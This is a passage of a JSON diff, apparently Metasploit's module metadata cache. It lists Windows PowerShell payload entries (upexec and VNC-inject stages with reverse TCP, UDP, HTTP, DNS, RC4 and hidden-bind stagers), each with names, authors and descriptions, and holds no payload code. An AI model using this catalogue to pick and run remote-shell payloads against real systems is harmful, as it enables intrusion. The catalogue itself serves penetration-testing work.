"cmd/windows/powershell/upexec/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/upexec/reverse_udp": { + "name": "Powershell Exec, Windows Upload/Execute, Reverse UDP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/upexec/reverse_udp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "vlad902 ", + "sf ", + "RageLtMan " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUploads an executable and runs it (staged).\n\nConnect back to the attacker with UUID Support", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/upexec/reverse_udp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/upexec/reverse_udp", + "staged": true, + "stage_refname": "windows/upexec", + "stager_refname": "windows/reverse_udp" + }, + "payload_cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp": { + "name": "Powershell Exec, Hidden Bind Ipknock TCP Stager", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection. First, the port will need to be knocked from\nthe IP defined in KHOST. This IP will work as an authentication method\n(you can spoof it with tools like hping). After that you could get your\nshellcode from any IP. The socket will appear as \"closed,\" thus helping to\nhide the shellcode", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/07/ip-knock-shellcode-spoofed-ip-as.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_ipknock_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_hidden_ipknock_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_hidden_ipknock_tcp" + }, + "payload_cmd/windows/powershell/vncinject/bind_hidden_tcp": { + "name": "Powershell Exec, Hidden Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_hidden_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection from a hidden port and spawn a command shell to the allowed host.", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection", + "URL-http://www.shelliscoming.com/2014/03/hidden-bind-shell-keep-your-shellcode.html" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_hidden_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_hidden_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_hidden_tcp" + }, + "payload_cmd/windows/powershell/vncinject/bind_ipv6_tcp": { + "name": "Powershell Exec, Bind IPv6 TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_ipv6_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_ipv6_tcp" + }, + "payload_cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid": { + "name": "Powershell Exec, Bind IPv6 TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for an IPv6 connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_ipv6_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_ipv6_tcp_uuid", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_ipv6_tcp_uuid" + }, + "payload_cmd/windows/powershell/vncinject/bind_named_pipe": { + "name": "Powershell Exec, Windows x86 Bind Named Pipe Stager", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_named_pipe", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "UserExistsError" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a pipe connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_named_pipe", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_named_pipe", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_named_pipe" + }, + "payload_cmd/windows/powershell/vncinject/bind_nonx_tcp": { + "name": "Powershell Exec, Bind TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_nonx_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_nonx_tcp" + }, + "payload_cmd/windows/powershell/vncinject/bind_tcp": { + "name": "Powershell Exec, Bind TCP Stager (Windows x86)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp" + }, + "payload_cmd/windows/powershell/vncinject/bind_tcp_rc4": { + "name": "Powershell Exec, Bind TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_tcp_rc4", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp_rc4" + }, + "payload_cmd/windows/powershell/vncinject/bind_tcp_uuid": { + "name": "Powershell Exec, Bind TCP Stager with UUID Support (Windows x86)", + "fullname": "payload/cmd/windows/powershell/vncinject/bind_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nListen for a connection with UUID Support (Windows x86)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/bind_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/bind_tcp_uuid", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/bind_tcp_uuid" + }, + "payload_cmd/windows/powershell/vncinject/find_tag": { + "name": "Powershell Exec, Find Tag Ordinal Stager", + "fullname": "payload/cmd/windows/powershell/vncinject/find_tag", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nUse an established connection", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/find_tag", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/find_tag", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/findtag_ord" + }, + "payload_cmd/windows/powershell/vncinject/reverse_http": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (wininet)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_http", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows wininet)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_http", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_http", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_http" + }, + "payload_cmd/windows/powershell/vncinject/reverse_http_proxy_pstore": { + "name": "Powershell Exec, Reverse HTTP Stager Proxy", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_http_proxy_pstore", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_http_proxy_pstore", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_http_proxy_pstore", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_http_proxy_pstore" + }, + "payload_cmd/windows/powershell/vncinject/reverse_ipv6_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (IPv6)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker over IPv6", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_ipv6_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_ipv6_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_ipv6_tcp" + }, + "payload_cmd/windows/powershell/vncinject/reverse_nonx_tcp": { + "name": "Powershell Exec, Reverse TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_nonx_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "vlad902 " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker (No NX)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_nonx_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_nonx_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_nonx_tcp" + }, + "payload_cmd/windows/powershell/vncinject/reverse_ord_tcp": { + "name": "Powershell Exec, Reverse Ordinal TCP Stager (No NX or Win7)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_ord_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "spoonm " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_ord_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_ord_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_ord_tcp" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp": { + "name": "Powershell Exec, Reverse TCP Stager", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp_allports": { + "name": "Powershell Exec, Reverse All-Port TCP Stager", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_allports", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTry to connect back to the attacker, on all possible ports (1-65535, slowly)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_allports", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp_allports", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_allports" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp_dns": { + "name": "Powershell Exec, Reverse TCP Stager (DNS)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_dns", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp_dns", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_dns" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp_rc4": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption, Metasm)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp_rc4", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_rc4" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns": { + "name": "Powershell Exec, Reverse TCP Stager (RC4 Stage Encryption DNS, Metasm)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "skape ", + "mihi", + "RageLtMan" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_rc4_dns", + "check": false, + "post_auth": true, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp_rc4_dns", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_rc4_dns" + }, + "payload_cmd/windows/powershell/vncinject/reverse_tcp_uuid": { + "name": "Powershell Exec, Reverse TCP Stager with UUID Support", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_tcp_uuid", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "OJ Reeves" + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nConnect back to the attacker with UUID Support", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_tcp_uuid", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_tcp_uuid", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_tcp_uuid" + }, + "payload_cmd/windows/powershell/vncinject/reverse_winhttp": { + "name": "Powershell Exec, Windows Reverse HTTP Stager (winhttp)", + "fullname": "payload/cmd/windows/powershell/vncinject/reverse_winhttp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "sf ", + "hdm ", + "Borja Merino " + ], + "description": "Execute an x86 payload from a command via PowerShell.\n\nTunnel communication over HTTP (Windows winhttp)", + "references": [ + "URL-https://github.com/stephenfewer/ReflectiveDLLInjection", + "URL-https://github.com/rapid7/ReflectiveDLLInjection" + ], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": "/modules/payloads/adapters/cmd/windows/powershell.rb", + "is_install_path": true, + "ref_name": "cmd/windows/powershell/vncinject/reverse_winhttp", + "check": false, + "post_auth": false, + "default_credential": false, + "notes": {}, + "session_types": false, + "needs_cleanup": false, + "payload_type": 8, + "adapter_refname": "cmd/windows/powershell", + "adapted_refname": "windows/vncinject/reverse_winhttp", + "staged": true, + "stage_refname": "windows/vncinject", + "stager_refname": "windows/reverse_winhttp" + }, + "payload_cmd/windows/powershell/x64/custom/bind_ipv6_tcp": { + "name": "Powershell Exec, Windows shellcode stage, Windows x64 IPv6 Bind TCP Stager", + "fullname": "payload/cmd/windows/powershell/x64/custom/bind_ipv6_tcp", + "aliases": [], + "rank": 300, + "disclosure_date": null, + "type": "payload", + "author": [ + "Spencer McIntyre", + "bwatters-r7", + "sf " + ], + "description": "Execute an x64 payload from a command via PowerShell.\n\nCustom shellcode stage.\n\nListen for an IPv6 connection (Windows x64)", + "references": [], + "platform": "Windows", + "arch": "cmd", + "rport": null, + "autofilter_ports": null, + "autofilter_services": null, + "targets": null, + "mod_time": "2022-05-27 16:41:25 +0000", + "path": 